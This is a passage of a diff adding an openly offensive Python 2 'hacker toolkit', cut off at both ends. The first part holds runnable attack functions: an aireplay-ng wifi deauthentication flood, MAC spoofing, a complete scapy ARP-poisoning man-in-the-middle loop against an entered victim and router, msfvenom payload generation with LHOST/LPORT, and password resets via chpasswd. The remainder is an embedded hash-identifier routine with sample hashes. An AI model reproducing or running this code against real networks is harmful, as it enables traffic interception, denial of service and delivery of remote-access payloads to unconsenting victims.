YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + 